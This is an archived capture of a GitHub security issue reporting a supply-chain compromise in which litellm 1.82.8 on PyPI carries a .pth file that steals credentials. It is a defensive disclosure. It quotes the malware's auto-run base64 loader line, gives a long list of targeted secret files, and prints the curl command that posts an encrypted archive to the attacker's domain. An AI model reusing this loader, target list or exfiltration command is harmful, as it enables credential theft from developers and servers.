{
    "archive_path": "archive/1774366479.218801",
    "base_url": "github.com/BerriAI/litellm/issues/24512",
    "basename": "24512",
    "bookmarked_date": "2026-03-24 15:34",
    "canonical": {
        "archive_org_path": "https://web.archive.org/web/github.com/BerriAI/litellm/issues/24512",
        "dom_path": "output.html",
        "favicon_path": "favicon.ico",
        "git_path": "git/",
        "google_favicon_path": "https://www.google.com/s2/favicons?domain=github.com",
        "headers_path": "headers.json",
        "htmltotext_path": "htmltotext.txt",
        "index_path": "index.html",
        "media_path": "media/",
        "mercury_path": "mercury/content.html",
        "pdf_path": "output.pdf",
        "readability_path": "readability/content.html",
        "screenshot_path": "screenshot.png",
        "singlefile_path": "singlefile.html",
        "warc_path": "warc/",
        "wget_path": null
    },
    "domain": "github.com",
    "downloaded_at": "2026-03-24T15:34:46.238699+00:00",
    "downloaded_datestr": "2026-03-24 15:34",
    "extension": "",
    "hash": "DKM9466QE7W9N4JBYXJ7",
    "history": {
        "archive_org": [
            {
                "cmd": [
                    "/usr/bin/curl",
                    "--silent",
                    "--location",
                    "--compressed",
                    "--proxy",
                    "socks5://tor-socks-proxy:9150",
                    "--head",
                    "--max-time",
                    "60",
                    "--user-agent",
                    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ArchiveBox/{VERSION} (+https://github.com/ArchiveBox/ArchiveBox/)",
                    "https://web.archive.org/save/https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "8.10.1",
                "end_ts": "2026-03-24T15:35:51.509822+00:00",
                "index_texts": null,
                "output": "ArchiveError: Failed to find \"content-location\" URL header in Archive.org response.",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:35:50.016251+00:00",
                "status": "failed"
            }
        ],
        "dom": [
            {
                "cmd": [
                    "/usr/bin/chromium-browser",
                    "--proxy-server=socks5://tor-socks-proxy:9150",
                    "--disable-features=DarkMode",
                    "--run-all-compositor-stages-before-draw",
                    "--hide-scrollbars",
                    "--autoplay-policy=no-user-gesture-required",
                    "--no-first-run",
                    "--use-fake-ui-for-media-stream",
                    "--use-fake-device-for-media-stream",
                    "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'",
                    "--headless=new",
                    "--no-sandbox",
                    "--no-zygote",
                    "--disable-dev-shm-usage",
                    "--disable-software-rasterizer",
                    "--disable-sync",
                    "--window-size=1440,2000",
                    "--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ArchiveBox/{VERSION} (+https://github.com/ArchiveBox/ArchiveBox/)",
                    "--user-data-dir=/data/personas/Default/chrome_profile",
                    "--profile-directory=Default",
                    "--dump-dom",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "131.0.6778",
                "end_ts": "2026-03-24T15:35:20.072230+00:00",
                "index_texts": null,
                "output": "output.html",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:34:57.195750+00:00",
                "status": "succeeded"
            }
        ],
        "favicon": [
            {
                "cmd": [
                    "/usr/bin/curl",
                    "--silent",
                    "--location",
                    "--compressed",
                    "--proxy",
                    "socks5://tor-socks-proxy:9150",
                    "--max-time",
                    "60",
                    "--output",
                    "favicon.ico",
                    "--user-agent",
                    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ArchiveBox/{VERSION} (+https://github.com/ArchiveBox/ArchiveBox/)",
                    "https://www.google.com/s2/favicons?domain=github.com"
                ],
                "cmd_version": "8.10.1",
                "end_ts": "2026-03-24T15:34:48.566370+00:00",
                "index_texts": null,
                "output": "favicon.ico",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:34:46.566451+00:00",
                "status": "succeeded"
            }
        ],
        "git": [],
        "headers": [
            {
                "cmd": [
                    "/usr/bin/curl",
                    "--silent",
                    "--location",
                    "--compressed",
                    "--proxy",
                    "socks5://tor-socks-proxy:9150",
                    "--head",
                    "--max-time",
                    "60",
                    "--user-agent",
                    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 ArchiveBox/{VERSION} (+https://github.com/ArchiveBox/ArchiveBox/)",
                    "https://github.com/BerriAI/litellm/issues/24512"
                ],
                "cmd_version": "8.10.1",
                "end_ts": "2026-03-24T15:34:49.932870+00:00",
                "index_texts": null,
                "output": "headers.json",
                "pwd": "/data/archive/1774366479.218801",
                "schema": "ArchiveResult",
                "start_ts": "2026-03-24T15:34:48.593495+00:00",
                "status": "succeeded"
            }
        ],
        "htmltotext": [
            {
                "cmd": [
                    "(internal) archivebox.extractors.htmltotext",
                    "./{singlefile,dom}.html"
                ],
                "cmd_version": "0.8.5rc51",
                "end_ts": "2026-03-24T15:35:41.253412+00:00",
                "index_texts": [
                    "(https://github.githubassets.com) (https://avatars.githubusercontent.com) (https://github-cloud.s3.amazonaws.com) (https://user-images.githubusercontent.com/) (https://github.githubassets.com) (https://avatars.githubusercontent.com) (https://github.githubassets.com/assets/light-0c8222dcd7a4f9b7.css) (https://github.githubassets.com/assets/light_high_contrast-51c0c6e0c085cc0f.css) (https://github.githubassets.com/assets/dark-fc6eec18532c3ae0.css) (https://github.githubassets.com/assets/dark_high_contrast-96d7b2bab5a6ae4e.css) (https://github.githubassets.com/assets/primer-primitives-6da842159062d25e.css) (https://github.githubassets.com/assets/primer-b55097560d244c08.css) (https://github.githubassets.com/assets/global-52276e82f63bb403.css) (https://github.githubassets.com/assets/github-247fbf4896d56210.css) (https://github.githubassets.com/assets/repository-6784600ba556c086.css) (https://github.githubassets.com/assets/react-core.50b17d2546e632b1.module.css) (https://github.githubassets.com/assets/primer-react-css.6d58de07ded3d36e.module.css) (https://github.githubassets.com/assets/76241.8707357635d77dd4.module.css) (https://github.githubassets.com/assets/41998.f96df211a1d944ee.module.css) (https://github.githubassets.com/assets/82588.693380fd96e2ae14.module.css) (https://github.githubassets.com/assets/78292.da04fc1c5f2a8167.module.css) (https://github.githubassets.com/assets/3818.86128f8a27158b4f.module.css) (https://github.githubassets.com/assets/39120.a10984576c39f670.module.css) (https://github.githubassets.com/assets/21302.6748ae39d3079039.module.css) (https://github.githubassets.com/assets/issues-react.98302f96ab23ca4c.module.css) (https://github.githubassets.com/assets/notifications-subscriptions-menu.15112b824f3022ce.module.css) [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer \u00b7 Issue #24512 \u00b7 BerriAI/litellm (repo_issues) (https://github.githubassets.com/) (/opensearch.xml) (GitHub) (https://github.com/fluidicon.png) (GitHub) (895) (https://github.com/BerriAI/litellm/issues/24512) (https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg) (https://github.githubassets.com/favicons/favicon.png) (https://github.githubassets.com/favicons/favicon.svg) (/manifest.json) (https://github.githubassets.com/assets/38963.f70dfea92b138b01.module.css) (https://github.githubassets.com/assets/70168.374ce4e648336309.module.css) (https://github.githubassets.com/assets/71849.38231ebf5311d902.module.css) (https://github.githubassets.com/assets/15484.038a1f7719f3aa9c.module.css) (https://github.githubassets.com/assets/42752.7fbb990f69b7c17c.module.css) (https://github.githubassets.com/assets/46055.7e2b76d2c6b5210d.module.css) (https://github.githubassets.com/assets/4861.6c08324f34899241.module.css) (https://github.githubassets.com/assets/20976.45f347a9b887cfda.module.css) (https://github.githubassets.com/assets/2857.5afce5871b4f7358.module.css) (https://github.githubassets.com/assets/61975.b129f60ae2849f5b.module.css)   Skip to content   (https://github.githubassets.com/assets/keyboard-shortcuts-dialog.afef1136cf37e489.module.css)    Navigation Menu Toggle navigation         (/)    (/login?return_to=https%3A%2F%2Fgithub.com%2FBerriAI%2Flitellm%2Fissues%2F24512) Sign in     Appearance settings (https://github.githubassets.com/assets/appearance-settings.5c7ccb6a718f6c1b.module.css)       (https://github.githubassets.com/assets/marketing-navigation.0d061fa8a7d6603d.module.css) Platform   AI CODE CREATION (https://github.com/features/copilot)    GitHub Copilot Write better code with AI    (https://github.com/features/spark)   GitHub Spark Build and deploy intelligent apps    (https://github.com/features/models)   GitHub Models Manage and compare prompts    (https://github.com/mcp)    MCP RegistryNew  Integrate external tools       DEVELOPER WORKFLOWS (https://github.com/features/actions)   Actions Automate any workflow    (https://github.com/features/codespaces)    Codespaces Instant dev environments    (https://github.com/features/issues)   Issues Plan and track work    (https://github.com/features/code-review)   Code Review Manage code changes       APPLICATION SECURITY (https://github.com/security/advanced-security)    GitHub Advanced Security Find and fix vulnerabilities    (https://github.com/security/advanced-security/code-security)    Code security Secure your code as you build    (https://github.com/security/advanced-security/secret-protection)   Secret protection Stop leaks before they start       EXPLORE (https://github.com/why-github) Why GitHub   (https://docs.github.com) Documentation     (https://github.blog) Blog     (https://github.blog/changelog) Changelog     (https://github.com/marketplace) Marketplace       (https://github.com/features) View all features        Solutions   BY COMPANY SIZE (https://github.com/enterprise) Enterprises   (https://github.com/team) Small and medium teams   (https://github.com/enterprise/startups) Startups   (https://github.com/solutions/industry/nonprofits) Nonprofits      BY USE CASE (https://github.com/solutions/use-case/app-modernization) App Modernization   (https://github.com/solutions/use-case/devsecops) DevSecOps   (https://github.com/solutions/use-case/devops) DevOps   (https://github.com/solutions/use-case/ci-cd) CI/CD   (https://github.com/solutions/use-case) View all use cases        BY INDUSTRY (https://github.com/solutions/industry/healthcare) Healthcare   (https://github.com/solutions/industry/financial-services) Financial services   (https://github.com/solutions/industry/manufacturing) Manufacturing   (https://github.com/solutions/industry/government) Government   (https://github.com/solutions/industry) View all industries         (https://github.com/solutions) View all solutions        Resources   EXPLORE BY TOPIC (https://github.com/resources/articles?topic=ai) AI   (https://github.com/resources/articles?topic=software-development) Software Development   (https://github.com/resources/articles?topic=devops) DevOps   (https://github.com/resources/articles?topic=security) Security   (https://github.com/resources/articles) View all topics        EXPLORE BY TYPE (https://github.com/customer-stories) Customer stories   (https://github.com/resources/events) Events & webinars   (https://github.com/resources/whitepapers) Ebooks & reports   (https://github.com/solutions/executive-insights) Business insights   (https://skills.github.com) GitHub Skills        SUPPORT & SERVICES (https://docs.github.com) Documentation     (https://support.github.com) Customer support     (https://github.com/orgs/community/discussions) Community forum   (https://github.com/trust-center) Trust center   (https://github.com/partners) Partners       (https://github.com/resources) View all resources        Open Source   COMMUNITY (https://github.com/sponsors)   GitHub Sponsors Fund open source developers       PROGRAMS (https://securitylab.github.com) Security Lab     (https://maintainers.github.com) Maintainer Community     (https://github.com/accelerator) Accelerator   (https://stars.github.com) GitHub Stars     (https://archiveprogram.github.com) Archive Program        REPOSITORIES (https://github.com/topics) Topics   (https://github.com/trending) Trending   (https://github.com/collections) Collections          Enterprise   ENTERPRISE SOLUTIONS (https://github.com/enterprise)     Enterprise platform AI-powered developer platform       AVAILABLE ADD-ONS (https://github.com/security/advanced-security)    GitHub Advanced Security Enterprise-grade security features    (https://github.com/features/copilot/copilot-business)    Copilot for Business Enterprise-grade AI features    (https://github.com/premium-support)    Premium Support Enterprise-grade 24/7 support           (https://github.com/pricing) Pricing       (Search or jump to...)    Search or jump to...      Search code, repositories, users, issues, pull requests... Search        ()   Clear                 (https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax) Search syntax tips          Provide feedback         (8FUdm1nH23SO9Lm6QFhJOTHBj/a4i0sn0aNuId9HThrHgc1IuEAn7It6OlbWGtzoYIdrxABQVXZ6rAuADwBUBQ==) We read every piece of feedback, and take your input very seriously.  Include my email address so I can be contacted    Cancel  Submit feedback     Saved searches  Use saved searches to filter your results more quickly         (dm/J/N+Gj4Kkn/xOtj19dUSDZTEDOAgG42iFzUcAuCVoGocpSXzVsh/GYZttJu5dsGjQ98oW4BtLkOzyHrdROg==)  Name (github-ruby) (H/UdEsHuyUQ8K1tHjGB6NAptKmoUvaahxUjc2Ygz3v/uPjR7/3CMuhO8jJUi3B8WAWezddOZPBVaAprrmJ0fHA==)   Query ((repo:mona/a OR repo:mona/b) AND lang:python)  To see all available qualifiers, see our (https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax) documentation .        Cancel  Create saved search        (/login?return_to=https%3A%2F%2Fgithub.com%2FBerriAI%2Flitellm%2Fissues%2F24512) Sign in   (/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fvoltron%2Fissues_fragments%2Fissue_layout&source=header-repo&source_repo=BerriAI%2Flitellm) Sign up     Appearance settings (https://github.githubassets.com/assets/appearance-settings.5c7ccb6a718f6c1b.module.css)     Resetting focus        You signed in with another tab or window. () Reload to refresh your session. You signed out in another tab or window. () Reload to refresh your session. You switched accounts on another tab or window. () Reload to refresh your session.    Dismiss alert       (/BerriAI) BerriAI   / (/BerriAI/litellm) litellm   Public     Sponsor    Sponsor BerriAI/litellm         External links (custom)    (https://buy.stripe.com/9AQ03Kd3P91o0Q8bIS) https://buy.stripe.com/9AQ03Kd3P91o0Q8bIS    (https://docs.github.com/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/displaying-a-sponsor-button-in-your-repository) Learn more about funding links in repositories .  (/contact/report-abuse?report=BerriAI%2Flitellm+%28Repository+Funding+Links%29) Report abuse          (/login?return_to=%2FBerriAI%2Flitellm)   Notifications  You must be signed in to change notification settings  (/login?return_to=%2FBerriAI%2Flitellm)   Fork (6,680) 6.7k   (/login?return_to=%2FBerriAI%2Flitellm)   Star  (40,184) 40.2k        (/BerriAI/litellm)   Code (Not available)    (/BerriAI/litellm/issues)    Issues (943) 943   (/BerriAI/litellm/pulls)   Pull requests (1,125) 1.1k   (/BerriAI/litellm/discussions)   Discussions (Not available)    (/BerriAI/litellm/actions)   Actions (Not available)    (/BerriAI/litellm/projects)   Projects (Not available)    (/BerriAI/litellm/security)   Security (0) 0   (/BerriAI/litellm/pulse)   Insights (Not available)        Additional navigation options (/BerriAI/litellm)    Code    (/BerriAI/litellm/issues)     Issues    (/BerriAI/litellm/pulls)    Pull requests    (/BerriAI/litellm/discussions)    Discussions    (/BerriAI/litellm/actions)    Actions    (/BerriAI/litellm/projects)    Projects    (/BerriAI/litellm/security)    Security    (/BerriAI/litellm/pulse)    Insights               (https://avatars.githubusercontent.com/u/56512981?u=c00ca0d1e354f5252951968ccacacd93efe1d565&v=4&size=80) (https://avatars.githubusercontent.com/u/56512981?u=c00ca0d1e354f5252951968ccacacd93efe1d565&v=4&size=48) [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer #24512   (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) New issue        Copy link    (/login?return_to=https://github.com/BerriAI/litellm/issues/24512) New issue        Copy link         Open         Open  [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 \u2014 credential stealer  #24512        Copy link      Labels (https://github.com/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation               (https://github.com/isfinne) (@isfinne)  Description (https://github.com/isfinne) (@isfinne)   (https://github.com/isfinne) isfinne  opened  (https://github.com/BerriAI/litellm/issues/24512#issue-4127260614) (Mar 24, 2026, 11:48 AM UTC) on Mar 24, 2026         Issue body actions      [Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package \u2014 credential stealer Summary The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth , 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts \u2014 no import litellm required. This is a supply chain compromise. The malicious file is listed in the package's own RECORD : litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628   (litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628)         Reproduction pip download litellm==1.82.8 --no-deps -d /tmp/check\npython3 -c \"  import zipfile, os whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0] with zipfile.ZipFile(whl) as z: pth = [n for n in z.namelist() if n.endswith('.pth')] print('PTH files:', pth) for p in pth: print(z.read(p)[:300]) \"   (pip download litellm==1.82.8 --no-deps -d /tmp/check\npython3 -c \"\nimport zipfile, os\nwhl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]\nwith zipfile.ZipFile(whl) as z:\n    pth = [n for n in z.namelist() if n.endswith('.pth')]\n    print('PTH files:', pth)\n    for p in pth:\n        print(z.read(p)[:300])\n\")         You will see litellm_init.pth containing: import os , subprocess , sys ; subprocess .Popen ([sys .executable , \"-c\" , \"import base64; exec(base64.b64decode('...'))\" ]) (import os, subprocess, sys; subprocess.Popen([sys.executable, \"-c\", \"import base64; exec(base64.b64decode('...'))\"]))         Malicious Behavior (full analysis) The payload is double base64-encoded . When decoded, it performs the following: Stage 1: Information Collection The script collects sensitive data from the host system: System info : hostname , whoami , uname -a , ip addr , ip route  Environment variables : printenv (captures all API keys, secrets, tokens) SSH keys : ~/.ssh/id_rsa , ~/.ssh/id_ed25519 , ~/.ssh/id_ecdsa , ~/.ssh/id_dsa , ~/.ssh/authorized_keys , ~/.ssh/known_hosts , ~/.ssh/config  Git credentials : ~/.gitconfig , ~/.git-credentials  AWS credentials : ~/.aws/credentials , ~/.aws/config , IMDS token + security credentials Kubernetes secrets : ~/.kube/config , /etc/kubernetes/admin.conf , /etc/kubernetes/kubelet.conf , /etc/kubernetes/controller-manager.conf , /etc/kubernetes/scheduler.conf , service account tokens GCP credentials : ~/.config/gcloud/application_default_credentials.json  Azure credentials : ~/.azure/  Docker configs : ~/.docker/config.json , /kaniko/.docker/config.json , /root/.docker/config.json  Package manager configs : ~/.npmrc , ~/.vault-token , ~/.netrc , ~/.lftprc , ~/.msmtprc , ~/.my.cnf , ~/.pgpass , ~/.mongorc.js  Shell history : ~/.bash_history , ~/.zsh_history , ~/.sh_history , ~/.mysql_history , ~/.psql_history , ~/.rediscli_history  Crypto wallets : ~/.bitcoin/ , ~/.litecoin/ , ~/.dogecoin/ , ~/.zcash/ , ~/.dashcore/ , ~/.ripple/ , ~/.bitmonero/ , ~/.ethereum/keystore/ , ~/.cardano/ , ~/.config/solana/  SSL/TLS private keys : /etc/ssl/private/ , Let's Encrypt .pem and .key files CI/CD secrets : terraform.tfvars , .gitlab-ci.yml , .travis.yml , Jenkinsfile , .drone.yml , Anchor.toml , ansible.cfg  Database credentials : PostgreSQL, MySQL, Redis, LDAP config files Webhook URLs : grep for Slack/Discord webhook URLs in env and config files  Stage 2: Encryption & Exfiltration Collected data is written to a temporary file A random 32-byte AES-256 session key is generated via openssl rand  The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2  The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep  Both encrypted files are packed into tpcp.tar.gz  The archive is exfiltrated via:  curl -s -o /dev/null -X POST \\ \" https://models.litellm.cloud/\"  \\\n  -H \" Content-Type: application/octet-stream\"  \\\n  -H \" X-Filename: tpcp.tar.gz\"  \\\n  --data-binary @tpcp.tar.gz (curl -s -o /dev/null -X POST \\\n  \"https://models.litellm.cloud/\" \\\n  -H \"Content-Type: application/octet-stream\" \\\n  -H \"X-Filename: tpcp.tar.gz\" \\\n  --data-binary @tpcp.tar.gz)         Key Technical Details Trigger mechanism : .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see (https://docs.python.org/3/library/site.html) Python docs on .pth files ). No import statement is needed. Stealth : The payload is double base64-encoded, making it invisible to naive source code grep. Exfiltration target : https://models.litellm.cloud/ \u2014 note the domain litellm.cloud (NOT litellm.ai , the official domain). RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...   Impact Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server. This affects: Local development machines CI/CD pipelines Docker containers Production servers  Affected Version Confirmed : litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl ) Other versions : Not yet checked \u2014 the attacker may have compromised multiple releases  Recommended Actions PyPI : Yank/remove litellm 1.82.8 immediately Users : Check for litellm_init.pth in your site-packages/ directory Users : Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed BerriAI : Audit PyPI publishing credentials and CI/CD pipeline for compromise  Environment OS: Ubuntu 24.04 (Docker container) Python: 3.13 pip installed from PyPI Discovered: 2026-03-24    \ud83d\udc4d React with \ud83d\udc4d 249   hnykda, harupy, treo, Wirg, orf and 244 more \ud83d\ude04 React with \ud83d\ude04 1   Eugene-Alexeev \ud83d\ude15 React with \ud83d\ude15 28   shameondev, rosaboyle, reallyyy, rachittshah, renehernandez and 23 more \ud83d\udc40 React with \ud83d\udc40 51   alexlach, AmineAfia, versusbassz, vitorhugods, Nikita-prog-art and 46 more         Activity (/BerriAI/litellm/issues/24512?timeline_page=1) Next         (/apps/github-actions) () github-actions   added (/BerriAI/litellm/issues?q=state%3Aopen%20label%3A%22llm%20translation%22) llm translation       (https://github.com/BerriAI/litellm/issues/24512#event-23849062138) (Mar 24, 2026, 11:49 AM UTC) on Mar 24, 2026            (https://github.com/hnykda) (hnykda)     hnykda commented (Mar 24, 2026, 12:07 PM UTC) on Mar 24, 2026   (/hnykda) (@hnykda)   (/hnykda) hnykda  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117688155) (Mar 24, 2026, 12:07 PM UTC) on Mar 24, 2026   \u00b7  edited by (https://github.com/hnykda) hnykda     Edits            More actions      Yep, we have been pwned by this. (https://github.com/krrishdholakia) @krrishdholakia this is very, very bad, thousands of people are likely getting pwned right now.   \ud83d\udc4d React with \ud83d\udc4d 16   Thibault00, jobsenn, rosaboyle, zackautocracy, derekelewis and 11 more        (https://github.com/treo) (treo)     treo commented (Mar 24, 2026, 12:32 PM UTC) on Mar 24, 2026   (/treo) (@treo)   (/treo) treo  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117874935) (Mar 24, 2026, 12:32 PM UTC) on Mar 24, 2026          More actions      Version 1.82.7 is also compromised. It doesn't have the pth file, but the payload is still in proxy/proxy_server.py.   \ud83d\udc4d React with \ud83d\udc4d 26   isfinne, ZeroCool2u, reptillicus, regismesquita, riyadparvez and 21 more               (/harupy) () harupy   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5244812100) (Mar 24, 2026, 12:41 PM UTC) on Mar 24, 2026       (https://github.com/mlflow/mlflow/pull/21971) Pin litellm<=1.82.6 to mitigate supply chain attack mlflow/mlflow#21971              (https://github.com/praiitt) (praiitt)     praiitt commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026   (/praiitt) (@praiitt)   (/praiitt) praiitt  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961388) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026          More actions      Thanks, that helped!          (https://github.com/praiitt) (praiitt)     praiitt commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026   (/praiitt) (@praiitt)   (/praiitt) praiitt  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961506) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026          More actions      This was the answer I was looking for.          (https://github.com/Hancie123) (Hancie123)     Hancie123 commented (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026   (/Hancie123) (@Hancie123)   (/Hancie123) Hancie123  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117961596) (Mar 24, 2026, 12:44 PM UTC) on Mar 24, 2026          More actions      Worked like a charm, much appreciated.          (https://github.com/programonaut) (programonaut)     programonaut commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/programonaut) (@programonaut)   (/programonaut) programonaut  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963641) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Thanks, that helped!          (https://github.com/Christopher933) (Christopher933)     Christopher933 commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/Christopher933) (@Christopher933)   (/Christopher933) Christopher933  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963694) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Thanks for the tip!          (https://github.com/mahesh-sini) (mahesh-sini)     mahesh-sini commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/mahesh-sini) (@mahesh-sini)   (/mahesh-sini) mahesh-sini  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963720) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Great explanation, thanks for sharing.          (https://github.com/bercanozcan) (bercanozcan)     bercanozcan commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/bercanozcan) (@bercanozcan)   (/bercanozcan) bercanozcan  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963848) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      This was the answer I was looking for.          (https://github.com/18pixels) (18pixels)     18pixels commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/18pixels) (@18pixels)   (/18pixels) 18pixels  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963876) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Thanks for the tip!          (https://github.com/Balerionth) (Balerionth)     Balerionth commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/Balerionth) (@Balerionth)   (/Balerionth) Balerionth  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117963932) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Great explanation, thanks for sharing.          (https://github.com/sanchir2011) (sanchir2011)     sanchir2011 commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/sanchir2011) (@sanchir2011)   (/sanchir2011) sanchir2011  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117964014) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Great explanation, thanks for sharing.          (https://github.com/bwanakweli4ever) (bwanakweli4ever)     bwanakweli4ever commented (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026   (/bwanakweli4ever) (@bwanakweli4ever)   (/bwanakweli4ever) bwanakweli4ever  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4117964252) (Mar 24, 2026, 12:45 PM UTC) on Mar 24, 2026          More actions      Great explanation, thanks for sharing.             394 remaining items    Load more         Load more actions              (/isaacbmiller) () isaacbmiller   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247448373) (Mar 24, 2026, 3:24 PM UTC) on Mar 24, 2026        (https://github.com/stanfordnlp/dspy/issues/9500) [Notice] DSPy Builds currently failing due to LiteLLM Breach stanfordnlp/dspy#9500                 (/teknium1) () teknium1   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23856977891) (Mar 24, 2026, 3:24 PM UTC) on Mar 24, 2026  (chore: pin all dependency version ranges (supply chain hardening)\n\nAdds upper-bound version pins (<next_major) to all dependencies in\npyproject.toml \u2014 both core and optional. Previously most deps were\nunpinned or had only floor bounds, meaning fresh installs would pull\nwhatever version was latest on PyPI.\n\nThis limits blast radius from supply chain attacks like the litellm\n1.82.7/1.82.8 credential stealer (BerriAI/litellm#24512). With bounded\nranges, a compromised major version bump won't be pulled automatically.\n\nFloors are set to current known-good installed versions.) (https://github.com/NousResearch/hermes-agent/commit/1b09b1c90d153f78c0fb451adf35eadf578b1c53) chore: pin all dependency version ranges (supply chain hardening)    ...    Verified (https://github.com/NousResearch/hermes-agent/commit/1b09b1c90d153f78c0fb451adf35eadf578b1c53) 1b09b1c                  (/teknium1) () teknium1   mentioned this (https://github.com/BerriAI/litellm/issues/24512#event-5247462088) (Mar 24, 2026, 3:25 PM UTC) on Mar 24, 2026       (https://github.com/NousResearch/hermes-agent/pull/2810) chore: pin all dependency version ranges (supply chain hardening) NousResearch/hermes-agent#2810                 (/teknium1) () teknium1   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23856991000) (Mar 24, 2026, 3:25 PM UTC) on Mar 24, 2026  (chore: pin all dependency version ranges (supply chain hardening) (#2810)\n\nAdds upper-bound version pins (<next_major) to all dependencies in\npyproject.toml \u2014 both core and optional. Previously most deps were\nunpinned or had only floor bounds, meaning fresh installs would pull\nwhatever version was latest on PyPI.\n\nThis limits blast radius from supply chain attacks like the litellm\n1.82.7/1.82.8 credential stealer (BerriAI/litellm#24512). With bounded\nranges, a compromised major version bump won't be pulled automatically.\n\nFloors are set to current known-good installed versions.) (https://github.com/NousResearch/hermes-agent/commit/c9b76057d417bacefb28e202e07af4c160bd3abc) chore: pin all dependency version ranges (supply chain hardening) ((https://github.com/NousResearch/hermes-agent/pull/2810) #2810     ...    Verified (https://github.com/NousResearch/hermes-agent/commit/c9b76057d417bacefb28e202e07af4c160bd3abc) c9b7605               (https://github.com/oza75) (oza75)     oza75 commented (Mar 24, 2026, 3:25 PM UTC) on Mar 24, 2026   (/oza75) (@oza75)   (/oza75) oza75  (https://github.com/BerriAI/litellm/issues/24512#issuecomment-4119174200) (Mar 24, 2026, 3:25 PM UTC) on Mar 24, 2026   \u00b7  edited by (https://github.com/oza75) oza75     Edits            More actions      Does anyone knows if 1.82.6 is also compromised?                 (/bussyjd) () bussyjd   added a commit that references this issue (https://github.com/BerriAI/litellm/issues/24512#event-23857170445) 